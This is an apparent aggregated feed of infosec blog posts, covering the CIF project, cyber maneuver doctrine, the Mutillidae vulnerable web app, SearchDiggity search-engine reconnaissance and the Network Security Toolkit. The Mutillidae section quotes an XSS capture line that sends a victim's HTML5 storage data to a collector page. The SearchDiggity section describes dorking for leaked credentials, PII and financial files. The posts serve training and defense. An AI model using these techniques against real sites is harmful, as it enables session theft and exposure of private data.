Check out the Idea List in the CIF Projects Lab; there is some excellent work to be done including a VMWare appliance, further Snort integration, a Virus Total analytic, and others. This project, like so many others we’ve discussed in toolsmith, grows and prospers with your feedback and contributions. Please consider participating by joining the CIF Google Group and jumping in. You’ll also want to check out the DFIR Journal’s CIF discussions, including integration with ArcSight, as well as EyeIS’s CIF incorporation with Splunk. These are the same folks who have brought us Security Onion 1.0 for Splunk, so I’m imaging all the possibilities for integration. Get busy with CIF, folks. It’s a work in progress but a damned good one at that.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Wes Young, CIF developer, Principal Security Engineer, REN-ISAC

MORPHINATOR & cyber maneuver as a defensive tactic

$
0
0
In June I read an outstanding paper from MAJ Scott Applegate, US Army, entitled The Principle of Maneuver in Cyber Operations, written as part of his work at George Mason University.
Then yesterday, I spotted a headline indicating that US Army has awarded a contract to Raytheon to develop technology for Morphing Network Assets to Restrict Adversarial Reconnaissance, or MORPHINATOR.
Aside from what might be the greatest acronym of all time (take that, APT) MORPHINATOR represents a defensive tactic well worthy of consideration in the private sector as well. While the Raytheon article is basically just a press release, I strongly advocate your reading MAJ Applegate's paper at earliest convenience. I will restate the principles for you here in the understanding that these are, for me, the highlights of this excellent research, as you might consider them for private sector use, and are to be entirely attributed to MAJ Applegate.
First, understand that the United States Military describes the concept of maneuver as "the disposition of forces to conduct operations by securing positional advantages before and or during combat operations."
MAJ Applegate proposes that the principles of maneuver as defined above require a significant amount of rethinking when applied to the virtual realm that constitutes cyberspace. "The methods and processes employed to attack and defend information resources in cyberspace constitute maneuver as they are undertaken to give one actor a competitive advantage over another."
While cyber maneuver as described in this paper include elements of offensive and defensive tactics, I think it most reasonable to explore defensive tactics as the primary mission when applied to the private sector.
While I privately and cautiously advocate active defense (offensive reaction to an attack) I'm not aware of too many corporate entities who readily embrace direct or overt offensive tactics.
The paper indicates that: "Cyber maneuver leverages positioning in the cyberspace domain to disrupt, deny, degrade, destroy, or manipulate computing and information resources. It is used to apply force, deny operation of or gain access to key information stores or strategically valuable systems." While this reads as a more offense-oriented statement, carry forward disrupt, deny, degrade, and manipulate to a defensive mindset.
Applying parts of MAJ Applegate's characteristics of cyber maneuver to defensive tactics would include speed, operational reach, dynamic evolution, rapid concentration, non-serial and distributed. Consider these in the context of private sector networks while reviewing direct quotes from the paper as such.
  • Speed: "Actions in cyberspace can be virtually instantaneous, happening at machine speeds."
  • Operational Reach: "Reach in cyber operations tends to be limited by the scale of maneuver and the ability of an element to shield its actions from enemy observation, detection and reaction."
  • Dynamic evolution: "Recent years have seen rise to heavy use of web based applications, cloud computing, smart phones, and converging technologies. This ongoing evolution leads to constant changes in tactics, techniques and procedures used by both attackers and defenders in cyberspace."
  • Non-serial and distributed: "Maneuver in cyberspace allows attackers and defenders to simultaneously conduct actions across multiple systems at multiple levels of warfare. For defenders, this can mean hardening multiple systems simultaneously when new threats are discovered, killing multiple access points during attacks, collecting and correlating data from multiple sensors in parallel or other defensive actions."

Incorporating the above characteristics as part of defensive tactics for the private sector does not negate the need to fully understand and defend against the additional characteristics found in the research including access & control, stealth & limited attribution, and rapid concentration. Liken access & control here to a "forward base" concept allowing attackers "to move the point of attack forward." Stealth & limited attribution clarifies that while action in cyberspace is "observable" most actions are not observed in a meaningful way." Think of this, in all seriousness as "what you don't know will kill you." Rapid concentration represents the mass effect of botnets and DDoS attacks and the ease with which they're deployed in cyberspace. As defenders we must be entirely cognitive of these elements and ensure agility in our response to the threats they represent.

Now to close the loop (analogy intended, see the paper's reference to an OODA (Observe-Orient-Decide-Act) loop) as it pertains to defensive tactics. The Principle of Maneuver in Cyber Operations offers four Basic Forms of Defensive Cyber Maneuver, three of which directly apply to private sector network operations.
  1. Perimeter Defense & Defense in Depth: Well known, well discussed, but not always well-done. "While defense in depth is a more effective strategy than a line defense, both these defensive formations suffer from the fact that they are fixed targets with relatively static defenses which an enemy can spend time and resources probing for vulnerabilities with little or no threat of retaliation."
  2. Moving Target Defense: "This form of defensive maneuver uses technical mechanisms to constantly shift certain aspects of targeted systems to make it much more difficult for an attacker to be able to identify, target and successfully attack a target." This can be system level address space layout randomization (ASLR) or constantly moving virtual resources in cloud-based infrastructure.
  3. Deceptive Defense: "The use use of these types of (honeypots) systems can allow a defender to regain the initiative by stalling an attack, giving the defender time to gather information on the attack methodology and then adjusting other defensive systems to account for the attacker’s tactics, techniques and procedures."
Drawing from part of MAJ Applegate's conclusion, when considering the principles described herein, "while maneuver in cyberspace is uniquely different than its kinetic counterparts, its objective remains the same, to gain a position of advantage over a competitor and to leverage that position for decisive success. It is therefore important to continue to study and define the evolving principle of maneuver in cyberspace to ensure the success of operations in this new warfighting domain."
I contend this is not a war pending, but a war upon us.
 While The Principle of Maneuver in Cyber Operations discusses this declaration specific to military operations, we are well advised to consider this precision of message in the private sector. GEN Keith Alexander, U.S. Cyber Command chief and the director of the National Security Agency, was recently quoted as saying that the loss of intellectual property due to cyber attacks amounts to the “greatest transfer of wealth in human history.” GEN Alexander went on to say "What I’m concerned about is the transition from disruptive to destructive attacks and I think that’s coming. We have to be ready for that."
Private sector and military resources alike need to think in these terms and act decisively. Cyber maneuver tactics offer intriguing options to be certain.
Use MAJ Applegate's fine work as reference material to perpetuate this conversation, and may the MORPHINATOR be with you.

toolsmith: NOWASP Mutillidae

$
0
0




Prerequisites
XAMPP is most convenient
NOWASP can be configured to run on Linux, Mac, and Windows

Introduction
I’m writing this month’s column fresh on the heels of presenting OWASP Top 10 Tools and Tactics for a SANS @Night event at the SANFIRE 2012 conference in Washington, DC. A quick shout out to my fellow Internet Storm Center handlers who I met there, along with all the excellent folks I met while attending the event. During the presentation I used Damn Vulnerable Web Application (DVWA) as a vulnerable test bed against which I demonstrated a number of web application assessment tools. Having been a longtime OWASP Webgoat user for such purposes, I had recently learned of DVWA from a great article on the PenTest Laboratory site entitled 10 Vulnerable Web Applications You Can Play With. As one who likens himself to a dog or a crow with AADD ("Look! Squirrel! Shiny object!), I literally read the article only enough to learn about DVWA and run down that rabbit hole never to look back. There are of course other excellent resources in the article and it is with a red face and a sense of irony that I can tell you the author of the second vulnerable web application on the list was in the audience for the above mentioned presentation. Jeremy Druin was extremely gracious and patiently waited until my presentation was over to tell me about his NOWASP Mutillidae. Had I only read that article past the first paragraph. Ah well, never too late to make amends. Jeremy’s timing was impeccable and fortuitous as there I was in search of this month’s topic. I immediately recruited him and asked for the requisite rundown on his creation.
"Mutillidae 2.x started with the idea to add "levels" to Mutillidae 1.x (created by Adrian Irongeek Crenshaw) with the idea that "level 0" would have no protection and "level 5" would have maximum protection. It was later discovered Mutillidae 1.x could not be easily upgraded and the project was rewritten and released in a separate fork. (Version 1.x is still available.). Once the Mutillidae 2.x fork was launched, several new vulnerabilities were added such that all OWASP 2007 and 2010 vulnerabilities were represented along with several others such as cross-frame scripting, forms-caching, information leakage via comments and html5 web-storage takeover.
Additional functionality was added to support CTF (capture the flag) contests such as a page which automatically captures and logs all cookies, get, and post parameters of any user that "visits". A second page displays all captured data along with the users IP address and the time of the capture. Based on feedback from users, the "hints" functionality was greatly expanded by making three levels of hints with increasing verbosity, adding several hundred extra hints including source code, and having "bubbles" pop-up in critically vulnerable areas when the user hovers over a particularly good target (i.e. a vulnerable input field).
"

Jeremy also pointed out that video tutorials have been posted to the webpwnized YouTube Channel detailing how to use tools and exploit the system. There are dozens of videos showing how to use Burp Suite, w3af, and netcat along with several videos dedicated to exploits such as SQL injection, cross-site scripting, html-5 web storage alteration, and command injection. New video posts as well as new release notices for Mutillidae are tweeted to @webpwnized.

Installing NOWASP Mutillidae
If you choose to install NOWASP on a LAMP or XAMPP stack and are having database connectivity issues, note that NOWASP is configured for root with a blank password to connect to MySQL. You’ll need to provide the correct settings to connect to your MySQL instance on line 16 in /mutillidae/classes/MySQLHandler.php and line 11 in /mutillidae/config.inc. It’s already properly configured if you choose to utilize the Samurai WTF distribution, so no need to change it there.
I built Mutillidae from scratch quite easily on an Ubuntu 11.04 virtual machine and once making the above mentioned configuration updates Mutillidae was immediately functional.

Using NOSWASP Mutillidae

According to Jeremy, "Mutillidae is being used as a web security training environment for corporate developer training where developers learn not only how web exploits work but how to exploit the sites themselves. Armed with this knowledge, they appreciate more readily the importance of writing secure code and understand better how to write secure code. Mutillidae is also used in a similar capacity in the graduate Information Security course at the University of Louisville Speed-Scientific Engineering School. Mutillidae has been included as a target in the Samurai-WTF web pen testing distribution since version 1.x and was recently added to Rapid7's Metasploitable-2 project. Over the last couple of years, Mutillidae has been part of CTF (capture the flag) competitions at Kentuckiana ISSA conferences and the 2012 AIDE Conference held at Marshall University. Because Mutillidae provides a well-understood set of vulnerabilities beyond the OWASP Top 10, it is used as a platform to evaluate security assessment tools in order to see which issues the tool can identify."
No time like the present to see what all positive feedback is all about. Adrian has a great video on the Irongeek site describing five of the most well-known vulnerabilities found in the 2007 OWASP Top 10, specifically cross-site scripting (XSS), SQL/command injection flaws, malicious file execution, insecure direct object reference, and cross-site request forgery (CSRF/XSRF). Don’t forget the webpwnized YouTube channel as well! To break with what’s already well documented I’ve opted here to discuss discovery of some of the less well known or popular vulnerabilities.
I’ll start you out of sequence in the OWASP Top 10 2010 with A8 - Failure To Restrict URL Access. Directly from the OWASP A8 description, applications do not always protect page requests properly. "Sometimes, URL protection is managed via configuration, and the system is misconfigured. Sometimes, developers must include the proper code checks, and they forget. Detecting such flaws is easy. The hardest part is identifying which pages (URLs) exist to attack." What’s one of the best ways to discover potentially unrestricted URLs that should otherwise be protected? At the top on my list of first things to do during penetration tests is check for a robots.txt file. Robots.txt is usually used to teach search crawlers how to behave when interacting with your site (thou shalt not crawl) but it’s always used by attackers, good and bad, to find interesting functionality or pages you don’t wish dissected. Mutillidae teaches a quick lesson here via http://192.168.195.128/mutillidae/robots.txt as seen in Figure 1.

Figure 1: Explore me
We find more than a few nuggets of goodness here to which access should never be allowed on sites you care anything about or don’t want tipped over in mere minutes if exposed to the Internet. No need to read documentation or conduct a web search for an account with which to log in to Mutillidae, the accounts.txt file in the exposed passwords directory will provide you everything you need. The config.inc file and the classes directory are freely available for browsing, config.inc will dump the above mentioned MySQL database connection strings. We’ll use content from the javascript directory against Mutillidae later in this discussion, and it’s never a good idea to expose your site’s documentation or the libraries you utilize to protect your site. The owasp-esapi-php directory contains the libraries and source code associated with the OWASP Enterprise Security API  which, when properly configured and restricted, is an excellent method for protecting your site from OWASP Top 10 vulnerabilities.

The OWASP Top 10 2010 A8 category is closely related to A6 - Security Misconfiguration; I really consider Failure to Restrict URL Access a subset of the A6 category. A6 also includes scenarios such as an application server configuration that "allows stack traces to be returned to users, potentially exposing underlying flaws. Attackers love the extra information error messages provide." So true. While playing with Mutillidae to learn about the Top 10 2010 A1 - Injection category you may benefit from a nice example of improper error handling as seen in Figure 2.

Figure 2: Failure is always an option


HTML 5 Web Storage serves as a great example of OWASP Top 10 2010-A7-Insecure Cryptographic Storage. It represents storage, sure, but when configured as badly (by design) as it on Mutillidae no cryptography will save you. Case in point, HTML 5 local storage. Take note of localStorage.getItem and setItem calls implemented in HTML5 pages as they help detect when developers build solutions that put sensitive information in local storage, which is a bad practice . Mutillidae offers excellent examples of ways to take advantage of getItem/setItem fail. You’ll find some detailed test scripts to experiment with and modify in the Mutillidae documentation folder. Remember I said it’s a good idea to protect documentation folders? I tweaked one of the examples to express my feelings for Mutillidae (setItem via MOD) and mock the victim while lifting their session data via XSS:

MOUSEOVER me and I’ll rob you blind! 

Figure 3 shows the resulting alert.

Figure 3: GotItem...like your Secure.Authentication token
While this example spawns an alert window when moused over but it could have just as easily been configured to write the results to an evil server. Mutillidae plays similarly for your pwn pleasure via the capture-data.php script by defining the likes of document.location="http://localhost/mutillidae/capture-data.php?html5storage=" in test scripts.

Finally, a quick look at OWASP Top 10 2010-A10-Unvalidated Redirects and Forwards with Burp Suite Pro. Among the plethora of other vulnerabilities readily discovered with Burp’s Scanner functionality, it’s my favorite tool for discovering open redirects too. Browse the Mutillidae menu for OWASP Top 10 then A10 and scan the Credits page. Your results should match mine as seen in Figure 4.


Figure 4: forwardurl...to wherever you’d like
From CWE-601 : "An HTTP parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance."
We wouldn’t want that would we?
Clearly, Mutillidae as a learning tool is indispensable. Make use of it for your own learning as well as that of the development teams you support. Weave it into your SDLC practices, you can’t go wrong.

In Conclusion

In late September, the current release of Mutillidae will be introduced at the upcoming annual Kentuckiana ISSA InfoSec Conference in Louisville, KY. This conference includes four different tracks with Mutillidae slated as one of the breakout sessions in the web application security track. All you Kentucky- area ISSA members (and non-member readers) please consider attending and discovering more about this great learning tool. Everyone else, setup Mutillidae immediately, sit down with your developer teams, and ensure their full understanding of how important secure coding practices are. Use Mutillidae as a tool to help them achieve that understanding.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers...until next month.

Acknowledgements

Jeremy Druin, NOWASP Mutillidae 2.0 developer

toolsmith: SearchDiggity - Dig Before They Do

$
0
0











Prerequisites
Windows .NET Framework

Introduction
I’ve been conducting quite a bit of open source intelligence gathering (OSINT) recently as part of a variety of engagements and realized I hadn’t discussed the subject since we last reviewed FOCA in March 2011 or Search Engine Security Auditing in June 2007. I’d recently had a few hits on my feed reader, and at least via one mailing lists, regarding SearchDiggity from Fran Brown and Rob Ragan of Stach & Liu. They’d recently presented Pulp Google Hacking at the 4thAnnual InfoSec Summit at ISSA Los Angeles as well as Tenacious Diggity at DEFCON 20 and the content certainly piqued my interest. One quick look at the framework and all its features and I was immediately intrigued. At first glance you note similarities to Wikto and FOCA given Search Diggity’s use of the Google Hacking Database and Shodan. This is no small irony as this team has taken point on rejuvenating the art of the search engine hack. In Fran’s InformationWeek report, Using Google to Find Vulnerabilities In YourIT Environment, he discusses toolsmith favorites FOCA, Maltego, and Shodan amongst others. I’ll paraphrase Fran from this March 2012 whitepaper to frame why using tools such as SearchDiggity and others in the Diggity arsenal is so important. Use these same methods to find flaws before the bad guys do; these methods use search engines such as Google and Bing to identify vulnerabilities in your applications, systems and services allowing you to fix them before they can be exploited. Fran and Rob’s work has even hit mainstream media with the likes of NotInMyBackyard (included in SearchDiggity) achieving coverage in USA Today. Suffice it to say that downloads from the Google Hacking Diggity Project pages jumped by 45,000 almost immediately, fueled largely by non-security consumers looking to discover any sensitive data leaks related to themselves or their organizations. A nice problem to have for the pair from Stach & Liu and one Fran addressed with a blogpost to provide a quick intro to NotInMyBackYardDiggity, to be discussed in more detail later in this article.  
I reached out to Fran and Rob rather late in this month’s writing process and am indebted to them as they kindly accommodated me with a number of resources as well a few minutes for questions via telephone. There are Diggity-related videos and tool screenshots as well as all the presentations the team has given in the last few years. The SearchDiggity team is most proud of their latest additions to the toolset, including NotInMyBackyard and PortScan. Keep in mind that, like so many tools discussed in toolsmith, SeachDiggity and its various elements were written to accommodate the needs of the developers during their own penetration tests and assessments. No cached data is safe from the Diggity Duo’s next generation search engine hacking arsenal and all their tools are free for download and use.

Installing Search Diggity

SearchDiggity installation is point-and-click simple after downloading the installation package, but there are few recommendations for your consideration. The default installation path is C:\Program Files (x86) \SearchDiggity, but consider using a non-system drive as an installation target to ensure no permissions anomalies; I installed in D:\tools\SearchDiggity. SearchDiggity writes results files to DiggityDownloads(I set D:\tools\DiggityDownloadsunder OptionsàSettingsàGeneral) and will need permission to its root in order to Update Query Definitions (search strings, Google/Bing Dorks).  

Using SearchDiggity

I started my review of SearchDiggity capabilities with the Bing Hacking Database (BHDB) under the Bing tab and utilizing the menu referred to as BHDBv2NEW as seen in Figure 1.

Figure 1: A BHDB analysis of HolisticInfosec.org
As with any tool, optimization of your scan settings for your target before you start the scan run is highly recommended. Given that my site is not an Adobe Coldfusion offering there’s really no need to look for CFIDE references, right? Ditto for Outlook Web Access or SharePoint, but CMS Config Files with XSS and SQL injection instreamset options are definitely in order. Good news, no significant findings were noted using my domain as the target.

NotInMyBackyard is a recent addition to SearchDiggity for which the team has garnered a lot of deserved attention and as such we’ll explore it here. I used my name as my primary search parameter and configured Methodsto include Quotes, and set Locations to include:
1)      Cloud Storage (Dropbox, Google Docs, Microsoft Skydrive, Amazon AWS)
2)      Document Sharing (scribd.com, 4shared.com, issuu.com, docstoc.com, wepapers.com)
3)      Pastebin(pastebin.com, snipt.org, drupalbin.com, paste.ubuntu.com, tinypaste.com, paste2.org, codepad.org, dpaste.com, pastie.org, pastebin.mozilla.org)
4)      Social(Facebook, Twitter, YouTube, LinkedIn)
5)      Forums(groups.google.com)
6)      Public presentations charts graphs videos (Slideshare, Prezi, present.me, Gliffy, Vimeo, Dailymotion, Metacafe)
You can opt to set additional parameters such as Extensionsfor document types including all versions of Microsoft Office, PDF,CSV, TXT, database types including MS-SQL and Access, backup, logs, and config files, as well as test and script files. My favorites (utilized in a separate run) are the financial file options including Quicken and QuickBooks data files and QuickBooks backup files. Finally, there are a number of granular keyword selections to narrow your query results that might include your patient records, places of birth, or your name in a data dump. This is extremely useful when trying to determine if your email address, as associated with one of your primary accounts, has been accumulated in a data dump posted to a Pastebin-like offering. Just keep in mind, the more options you select the longer your query run will take. I typically carve my searches up in specific categories then export the results to a file named for the category.
As seen in Figure 2, NotInMyBackyard reveals all available query results in a clean, legible manner that includes hyperlinks to the referenced results, allowing you to validate the findings.

Figure 2: NotInMyBackyard flushes out results
I found that my search, as configured, was more enlightening specific to all the copies of my material posted to other sites without my permission. It was also interesting to see where articles and presentation material were cited in academic material. Imagine using your organizational domain name, and specific keywords and accounts to discover what’s exposed to the evildoers conducting the same activity.
You can focus similar activity with more attention to the enterprise mindset utilizing SearchDiggity’s DLP offerings. First conduct a Google or Bing run against a domain of interest using the DLPDiggity Initial selection. Once the query run is complete, highlight all the files (CTRL-A works well), and click the download button. This will download all the files to the download directory you configured, populating it with files discovered using DLPDiggity Initial, against which you can then apply the full DLP menu. I did as described against a target that shall remain unnamed and found either valid findings or sample/example data that matched the search regex explicitly as seen in Figure 3.

Figure 3: Data Leak Prevention with SearchDiggity
 I only used the Quick Checks set here too. When you contemplate the likes of database connection strings, bank account numbers, and encryption-related findings, coupled with the requisite credit cards, SSNs, and other PII, it becomes immediately apparent how powerful this tool is for both prevention and discovery during the reconnaissance phase of a penetration test.

I’ll cover one more SearchDiggity component but as is usually the case with toolsmith topics there is much about the tool du jour that remains unsaid. Be sure to check out the SearchDiggity Shodan and PortScan offerings on your own. I’m always particularly interested in Flash-related FAIL findings and SearchDiggity won’t disappoint here either. Start with a Google or Bing search against a target domain with FlashDiggity Initial enabled. Much as noted with the DLP feature, after discovery, SearchDiggity will download the SWF files it identifies with FlashDiggity Initial. As an example I ran this configuration without a domain specified. By default, for a Google search, 70 results per query will be returned. Suffice it to say that with the three specific queries defined in FlashDiggity Initial searches, I was quickly treated to 210 results which I then opted to download. I switched over the Flash menu and for real s’s and g’s (work that one out on your own :-)) enabled alloptions. Figure 4 exemplifies (anonymously) just how concerning certain Flash implementations may be, particularly when utilized for administrative functions and authentication.

Figure 4: Find bad Flash with SearchDiggity
 FlashDiggity decompiles the downloaded SWF files with Flare and stores the resulting .flr file in the download directory for your review. It should go without saying that flaw enumeration becomes all that much easier. As an example, FlashDiggity’s getURL XSS detection discovered the following using geturl\(.*(_root\.|_level0\.|_global\.).*\)as its regex logic:  
this.getURL('mailto:' + _global.escape(this.decodeEmailAddr(v2.emladdr)) + '?subject=' + _global.escape(v2.emlsubj) + '&body=' + _global.escape(this.getEmailContent()));
This snippet makes for interesting analysis. Risks associated with getURLare well documented but the global escape may mitigate the issue. That said, the Flash file was created with Techsmith Camtasia in January 2009, and an XSS vulnerability was reported in October 2009 regarding SWF files created with Camtasia Studio. Yet, SWF files hosted on TechSmith’s Screencast service were not vulnerable and more than one reference to Screencast was noted in the decompiled .flr file. With one FlashDiggity search, we were able to learn a great deal about potentially flawed Flash files subject to possible exploit.
And we didn’t even touch SearchDiggity’s malware analysis feature set.  

In Conclusion

As always I’ll remind you, please use SearchDiggity for good, not evil. Incorporating its use as part of your organizational defensive tactics is a worthy effort. Keep in mind that you can also leverage this logic as part of Google Hacking Diggity Defense Tools including Alert and Monitoring RSS feeds. Configure them with your specific and desired organizational parameters and enjoy real time alerting and monitoring via your RSS feed reader. For those of you defending Internet-facing SharePoint implementations you’ll definitely want to check out the SharePoint Diggity Hacking Project too.
Enjoy this tool arsenal from Stach & Liu’s Dynamic Duo; they’d love to hear from you with kudos, constructive criticism, and feature requests via diggity at stachliu.com.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Francis Brown and Rob Ragan, Managing Partners, Stach & Liu, Google Hacking Diggity project leads

The replacement security analyst's Top 10

$
0
0
I'm a huge football fan so the depth of my joy at the return of the "real" NFL referees cannot be measured. Given the replacement ref debacle I felt compelled to share a replacement security analyst's Top 10.
Note: at one time or another in my career I have truly heard all of these.
In no particular order...

  1. Disable AV altogether, its inconvenient when moving malware samples around.
  2. Passwords longer than eight characters make it hard to do your job.
  3. Don't worry about chain of custody or evidence integrity, cases rarely go to court anyway.
  4. When a concerned user calls about a potentially compromised system, tell them to just run McAfee Stinger.
  5. Why would you want to keep DNS logs?
  6. Go ahead and give developers the ability to deploy code to straight to production from their desktops. It helps them be agile and creates efficiency.
  7. Proxying egress web traffic is an invasion of privacy and makes users mad, so don't do it.
  8. Your vulnerability scanner is causing my service to crash! Turn it off!
  9. We don't need to fix XSS. You can't hack a server with it.
  10. But it is encrypted. We used MD5 hashing to store the credit cards in the database.
In a similar vein, you'll really enjoy Infosec Reactions if you haven't already seen it.
Welcome back, NFL refs. :-)
Cheers.

toolsmith: Network Security Toolkit (NST) - Packet Analysis Personified

$
0
0




Prerequisites
Virtualization software if you don’t wish to run NST as a LiveCD or install to dedicated hardware.

Introduction
As I write this I’m on the way back from SANS Network Security in Las Vegas where I’d spent two days deeply entrenched analyzing packet captures during the lab portion of the GSE exam. During preparation for this exam I’d used a variety of VM-based LiveCD distributions to study and practice, amongst them Security Onion. There are three distributions I run as VMs that are always on immediate standby in my toolkit. They are, in no particular order, Doug Burk’s brilliant Security Onion, Kevin Johnson’s SamuraiWTF, and Back Track 5 R3. Security Onion and SamuraiWTFhave both been toolsmith topics for good reason; I’ve not covered Back Track only because it would seem so cliché. I will tell you that I am extremely fond of Security Onion and consider it indispensable. As such, I hesitated to cover the Network Security Toolkit (NST) when I first learned of it while preparing for the lab, feeling as if it might violate some code of loyalty I felt to Doug and Security Onion. Weird I know, and the truth is Doug would be one of the first to tell you that the more tools made available to defenders the better. NST represents a number of core principles inherent to toolsmith and the likes of Security Onion. NST is comprehensive and convenient and allows the analyst almost immediate and useful results. NST is an excellent learning tool and allows beginners and experts much success in discovering more about their network environments. NST is also an inclusive, open project that grows with help from an interested and engaged community. The simple truth is Security Onion and NST represent different approaches to complex problems. We all have a community to serve and the same goals at heart, so I got over my hesitation and reached out to the NST project leads.
The Network Security Toolkit is the brainchild of Paul Blankenbaker and Ron Henderson and is a Linux distribution that includes a vast collection of best-of-breed open source network security applications useful to the network security professional. In the early days of NST Paul and Ron found that they needed a common user interface and unified methodology for ease of access and efficiency in automating the configuration process. Ron’s background in network computing and Paul’s in software development lead to what is now referred to as the NST WUI (Web User Interface). Given the wide range of open source networking tools with corresponding command line interface that differ from one application to the next, this was no small feat. The NST WUI now provides a means to allow easy access and a common look-and-feel for many popular network security tools, giving the novice the ability to point and click while also providing advanced users (security analysts, ethical hackers) options to work directly with command line console output.
According to Ron, one of the most beneficial tool enhancements that NST has to offer for the network and security administrator is the Single-Tap and Multi-Tap Network Packet Capture interface. Essentially, adding a web-based front-end to Wireshark, Tcpdump, and Snort for packet capture analysis and decode has made it easy to perform these tasks using a web browser. With the new NST v2.16.0-4104 release they took it a step forward and integrated CloudShark technology into the NST WUI for collaborative packet capture analysis, sharing and management.
Ron is also fond of the Network Interface Bandwidth monitor.  This tool is an interactive dynamic SVG/AJAX enabled application integrated into the NST WUI for monitoring Network Bandwidth
usage on each configured network interface in pseudo real-time. He designed this application with the controls of a standard digital oscilloscope in mind.
Ron is also proud of NST’s ability to Geolocate network entities. We’ll further explore using NST’s current repertoire of available network entities that can geolocated with their associated application, as well as Ron’s other favorites mentioned above.
Paul also shared something I enjoyed as acronyms are so common in our trade. He mentioned that the NST distribution can be used in many situations. One of his personal favorites is related to the FIRST Robotics Competition (FRC) which occurs each year. FIRST for Paul is For Inspiration and Recognition of Science and Technology where I am more accustomed to its use as Forum for Incident Response and Security Teams. Paul mentors FIRST team 868, the TechHounds at the Carmel high school in Indiana, where in FRC competitions, teams have used NST (or could use) during a hectic FRC build season:
·      Quickly identity which network components involved with operating the robot are "alive"
o   From the WUI menu: Security -> Active Scanners -> ARP Scan (arp-scan)
·         Observe how much network traffic increases or decreases as we adjust the IP based robot camera settings
o   From the WUI menu: Network -> Monitors -> Network Interface Bandwidth Monitor
·         Capture packets between the robot and the controlling computer
·         Scan the area for WIFI traffic and use this information to pick frequencies for robot communications that are not heavily used
·         Set up a Subversion and Trac server for managing source code through the build season.
o   From the WUI menu: System -> File System Management -> Subversion Manager
·         Teach the benefits of scripting and automating tasks
·         Provide an environment that can be expanded and customized
While Paul and team have used NST for robotics, it’s quite clear how their use case bullet list applies to the incident responder and network security analyst. 

Installing NST

NST, as an ISO, can be run as LiveCD, installed to dedicated hardware, and also as a virtual machine.If you intend to take advantage of the Multi-Tap Network Packet Capture interface feature with your NST installation set up as a centralized, aggregating sensor then you’ll definitely want to utilize dedicated hardware with multiple network interfaces. As an example, Figure 1displays using NST to capture network and port address translation traffic across a firewall boundary.

Figure 1: Multi-Tap Network Packet Capture Across A Firewall Boundary - NAT/PAT Traffic
Once booted into NST you can navigate from Applications to System Tools to Install NST to Hard Drive in order to execute a dedicated installation.
Keep in mind that when virtualizing you could enable multiple NICs to leverage multi-tap, but your performance will be limited as you’d likely do so on a host system with one NIC.

Using NST

NST use centers around the WUI; access it via Firefox on the NST installation at http://127.0.0.1/nstwui/main.cgi. 
The first time you login, you’ll be immediately reminded to change the default password (nst2003). After doing so, log back in and select Tools-> Network Widgets -> IPv4 Address. Once you know what the IP address is you can opt to use NST WUI from another browser. My session as an example: https://192.168.153.132/nstwui/index.cgi.
Per Ron’s above mentioned tool enhancements, let’s explore Single-Tap Network Packet Capture (I’m running NST as a VM). Click Network -> Protocol Analyzers -> Single-Tap Network Packet Capturewhere you’ll be presented with a number of options regarding how you’d like to configure the capture. You can choose define the likes of duration, file size, and packet count or select predefined short or long capture sessions as seen in Figure 2.

Figure 2: Configure a Single-Tap capture with NST
If you accepted defaults for capture storage location you can click Browseand find the results of your efforts in /var/nst/wuiout/wireshark. Now here’s where the cool comes in. CloudShark (yep, Wireshark in the cloud) allows you to “secure, share, and analyze capture files anywhere, on any device” via either cloudshark.org or a CloudShark appliance. Please note that capture files uploaded to cloudshark.org are not secured by default and can be viewed by anyone who knows the correct URL. You’ll need an appliance or CloudShark Enterprise to secure and manage captures. That aside the premise of CloudShark is appealing and NST integrates CloudShark directly. From the Tools menu select Network Widgets then CloudShark Upload Manager. I’d already upload malicious.pcap as seen in Figure 3.

Figure 3: CloudShark tightly integrated with NST
Users need only click on View Network Packet Captures in the upload manager and they’ll be directed right to the CloudShark instance of their uploaded capture as seen in Figure 4.

Figure 4: Capture results displayed via CloudShark
Many of the features you’d expect from a local instance of Wireshark are available to the analyst, including graphs, conversations, protocol decodes, and follow stream.

NST also includes the Network Interface Bandwidth Monitor. Select Network-> Monitors -> Network Interface Bandwidth Monitor. A bandwidth monitor for any interface present on your NST instance will be available to you (eth0 and lo on my VM) as seen in Figure 5.

Figure 5: NST’s Network Interface Bandwidth Monitor
You can see the +100 kbps spikes I generated against eth0 with a quick NMAP scan as an example.

NST’s geolocation capabilities are many, but be sure to setup the NST system to geolocate data first. I uploaded a multiple host PCAP (P2P traffic) via Network Packet Capture Manager, clicked the A (attach) button under Action and was them redirected back to Network -> Protocol Analyzers -> Single-Tap Network Packet Capture.I then chose to use the Text-Based Protocol Analyzer Decode option as described on the NST Wikiand clicked the Hosts – Google Mapsbutton. This particular capture gave NST a lot of work to do as it includes thousands of IPs but the resulting geolocated visualization as seen in Figure 6is well worth it.

Figure 6: P2P bot visually geolocated via NST
If we had page space available to show you the whole world you’d see that the entire globe is represented by this bot, but I’m only showing you North America and Europe.

As discussed in recent OSINT-related toolsmiths, there’s even an NST OSINT feature called theHarvester found under Security -> Information Search -> theHarvester. Information gathering with theHarvester includes e-mail accounts, user names, hostnames, and domains from different public internet sources.
So many features, so little time. Pick an item from the menu and drill in. There’s a ton of documentation under the Docs menu too, including the NST Wiki, so you have no excuses not to jump in head first.

In Conclusion

NST is one of those offerings where the few pages dedicated to it in toolsmith don’t do it justice. NST is incredibly feature rich, and literally invites the user to explore while the hours sneak by unnoticed. The NST WUI has created a learning environment I will be incorporating into my network security analysis teaching regimens. New to network security analysis or a salty old hand, NST is a worthy addition to your tool collection.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Paul Blankenbaker and Ron Henderson, NST project leads

toolsmith: Arachni - Web Application Security Scanner

$
0
0


Part 1 of 2 - Web Application Security Flaw Discovery and Prevention


Prerequisites/dependencies
Ruby 1.9.2 or higher in any *nix environment

Introduction
